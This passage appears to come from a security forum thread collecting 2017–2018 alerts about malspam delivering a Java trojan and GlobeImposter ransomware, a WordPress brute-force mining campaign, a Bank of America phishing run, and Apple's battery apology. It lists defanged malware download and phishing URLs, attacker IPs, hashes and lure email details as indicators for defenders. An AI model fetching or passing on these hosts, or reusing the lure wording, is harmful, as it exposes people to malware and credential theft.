- https://myonlinesecurity.co.uk/fake-your-ups-invoice-is-ready-malspam-delivers-java-adwind-java-jrat-trojan/
24 Dec 2017
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/fake_UPS_Invoice.png
INVOICE.zip: extracts to INVOICEE.jar (533kb) - Current Virus total detections 14/61* | Hybrid Analysis**...
"... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f2a298fa8e51713b4d2ee94e3e68945ded5e2ff4f7e2422e5c3acf4275b3cabc/analysis/1514092872/
INVOICEE.jar
** https://www.hybrid-analysis.com/sample/f2a298fa8e51713b4d2ee94e3e68945ded5e2ff4f7e2422e5c3acf4275b3cabc?environmentId=100
DNS Requests
185.171.25.4
Contacted Hosts
46.246.120.179
92.122.154.56
:fear::fear: :mad:
AplusWebMaster
2017-12-26, 21:00
FYI...
Fake blank/empty SPAM - delivers globeimposter ransomware
- https://myonlinesecurity.co.uk/more-necurs-botnet-spam-delivers-globeimposter-ransomware/
26 Dec 2017 - "... malware downloaders from the Necurs botnet... a blank/empty email with the subject of 'CCE26122017_004385' (random numbers after the date) pretending to come from random names and random email addresses that just has a 7z attachment containing a .js file... One of the emails looks like:
From: Emmitt <Emmitt@ kendrixcorp .com>
Date: Tue 26/12/2017 15:04
Subject: CCE26122017_004385
Attachment: CCE26122017_004385.7z
Body content: completely blank/empty
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-26_15-28-28.png
CCE26122017_004385.7z: Extracts to: CCE26122017_48779.js - Current Virus total detections 11/58*. Hybrid Analysis**...
This particular version downloads from
http ://www.thedournalist .com/mnbTREkfDS??jYAbcsB=jYAbcsB (there will normally be 6-8 other download locations)
(VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/100322884e21b1bac77fb7634ae89e352610de9d734a509365e2a3c242a1369a/analysis/1514301126/
CCE26122017_48779.js
** https://www.hybrid-analysis.com/sample/100322884e21b1bac77fb7634ae89e352610de9d734a509365e2a3c242a1369a?environmentId=100
DNS Requests
86.106.30.37
Contacted Hosts
86.106.30.37
3] https://www.virustotal.com/en/file/3a9d5976fbf41daf80f0eb9e6b7aadcece52a82fe9609984ef7f8ea166048547/analysis/1514301538/
mnbTREkfDS.exe
thedournalist .com: 86.106.30.37: https://www.virustotal.com/en/ip-address/86.106.30.37/information/
___
Massive Brute-Force Attack Infects WordPress Sites with Monero Miners
- https://www.bleepingcomputer.com/news/security/massive-brute-force-attack-infects-wordpress-sites-with-monero-miners/
Dec 20, 2017 - "... WordPress sites around the globe have been the targets of a massive brute-force campaign during which hackers attempted to guess admin account logins in order to install a Monero miner on compromised sites...
Once attackers get in, they install a Monero miner, and they also use the infected site to carry out further brute-force attacks. These two operations don't happen at the same time, and each site is either brute-forcing other WordPress sites or mining Monero..."
WordPress Brute Force Attack Campaign
- https://www.wordfence.com/blog/2017/12/aggressive-brute-force-wordpress-attack
Dec 18, 2017 - "A massive distributed brute force attack campaign targeting WordPress sites started this morning at 3am Universal Time, 7pm Pacific Time. The attack is broad in that it uses a large number of attacking IPs, and is also deep in that each IP is generating a huge number of attacks. This is the most aggressive campaign we have seen to date, peaking at over 14 million attacks per hour. The attack campaign was so severe that we had to scale up our logging infrastructure to cope with the volume when it kicked off, which makes it clear that this is the highest volume attack that we have seen in Wordfence history, since 2012..."
___
Remove the Slmgr32.exe Monero CPU Miner
- https://www.bleepingcomputer.com/virus-removal/remove-slmgr32.exe-monero-cpu-miner
Nov 3, 2017
:fear::fear: :mad:
AplusWebMaster
2017-12-29, 12:46
FYI...
Fake 'Scan' SPAM - Necurs botnet traffic
- https://myonlinesecurity.co.uk/freaky-friday-malware-delivery-failure-necurs-botnet-sending-malformed-emails-supposed-to-deliver-globeimposter-ransomware/
29 Dec 2017 - "... Necurs botnet... several hundred I have received in the last hour have been quarantined on my mail server. The next in the never ending series of malware downloaders is an email with the subject of 'Scan' pretending to come from random names and email address. The name in the email body matches the alleged sender...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-29_10-17-04.png
Scan_0041.7z: Extracts to: -6dt874p53077.js - Current Virus total detections 14/59*. Hybrid Analysis**...
This particular js has these 3 urls embedded in it (there will be dozens of other Urls that download the payload in different js files). It uses the first url & only moves to the next if the first does not respond
(VirusTotal 9/66[3])...
http ://damynghedunglinh .com/YoepHGds?
http ://3dpvietnam .com/YoepHGds?
http ://emergency-help .com.au/YoepHGds? ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1e71e61ebcabc7b5da7e797fd28656c6684c03a632131e8341757152328370af/analysis/1514542049/
Scan_005416.js
** https://www.hybrid-analysis.com/sample/1e71e61ebcabc7b5da7e797fd28656c6684c03a632131e8341757152328370af?environmentId=100
DNS Requests
198.143.137.42
Contacted Hosts
198.143.137.42
3] https://www.virustotal.com/en/file/16c5fa60941cb337b5c5adbb808a7659e7f411da334d63c5bbe9506e81678a7d/analysis/1514542104/
YoepHGds.exe
damynghedunglinh .com: 198.143.137.42: https://www.virustotal.com/en/ip-address/198.143.137.42/information/
> https://www.virustotal.com/en/url/1d53980b609cbb6ff70ed3857c183ebe398c0d2987a3f2606d2d75d032bba43c/analysis/
___
Apple 'Batterygate'
>> https://www.cnbc.com/2017/12/28/apple-batterygate-letter-full-text.html
Dec 29, 2017 - 14 Hours Ago
"Apple apologizes for iPhone slowdowns and offers $29 battery replacements..."
Video 1:55
>> https://www.reuters.com/article/us-apple-batteries/apple-apologizes-after-outcry-over-slowed-iphones-idUSKBN1EM20N
Dec 28, 2017 - "... Apple Inc (AAPL.O) is slashing prices for battery replacements and will change its software to show users whether their phone battery is good..."
> https://www.apple.com/iphone-battery-and-performance/
Dec 28, 2017 - "A Message to Our Customers about iPhone Batteries and Performance...
Apple is reducing the price of an out-of-warranty iPhone battery replacement by $50 — from $79 to $29 — for anyone with an iPhone 6 or later whose battery needs to be replaced, starting in late January and available worldwide through December 2018. Details will be provided soon on apple.com.
Early in 2018, we will issue an iOS software update with new features that give users more visibility into the health of their iPhone’s battery, so they can see for themselves if its condition is affecting performance..."
:fear::fear: :mad:
AplusWebMaster
2018-01-17, 20:00
FYI...
BoA - phish
- https://myonlinesecurity.co.uk/bank-of-america-alert-phishing/
17 Jan 2017 - ".... an aggressive phishing campaign against Bank of America arriving overnight UK time. They all pretend to come from Bank of America < BankofAmerica@ customerloyalty.accounts.com > but are actually coming from various servers. I have posted details of 2 that I received. The emails are identical apart for the subject line. There will almost certainly be other similar subjects that I haven’t seen yet.
The subjects I have seen so far are:
Bank of America Alert Sign-in to Online Banking Locked
Bank of America Alert: Unlock Your Account Important Message From Bank Of America ®
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2018/01/2018-01-17_04-18-51.png
The link in the email http ://www .valaskabela .sk/new .php -redirects- you to:
http ://bankofamerica-com-update-work-new2018.hbdhshjdsjkds .co.uk/d983474dae569d3bdffe8735ae43151a/ (random ID /referral string after the co.uk/)...
hbdhshjdsjkds .co.uk: 162.241.225.135: https://www.virustotal.com/en/ip-address/162.241.225.135/information/
> https://www.virustotal.com/en/url/1ea0fc4f53e99c573ddca18387422f1713a3aaea12f67cdf556121ebffd9a003/analysis/
accounts .com: 204.14.52.151: https://www.virustotal.com/en/ip-address/204.14.52.151/information/
> https://www.virustotal.com/en/url/d7e5bb11af992b36391a0d1b0c6e6fed92aad23f0e22186052351c27fb30c1df/analysis/
Screenshot2: https://myonlinesecurity.co.uk/wp-content/uploads/2018/01/2018-01-17_04-18-01.png
All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."
:fear::fear: :mad: